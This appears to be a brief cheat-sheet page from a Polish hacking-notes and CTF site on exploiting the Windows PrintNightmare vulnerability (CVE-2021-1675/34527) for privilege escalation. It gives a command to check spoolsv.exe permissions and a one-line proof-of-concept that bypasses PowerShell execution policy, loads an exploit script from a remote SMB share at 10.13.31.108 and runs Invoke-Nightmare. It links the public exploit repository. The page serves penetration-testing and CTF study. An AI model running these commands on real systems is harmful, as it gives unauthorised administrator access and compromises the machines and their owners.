>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Privilege Escalation / PrintNightmare (CVE-2021-1675 / 34527)

PrintNightmare (CVE-2021-1675 / 34527)

Privilege Escalation Windows Misc windows

Verify spoolsv

icacls.exe "C:\Windows\System32\spoolsv.exe"

Run the PoC

powershell -ep bypass . \\10.13.31.108\share\CVE-2021-1675.ps1;Invoke-Nightmare

Reference

https://github.com/calebstewart/CVE-2021-1675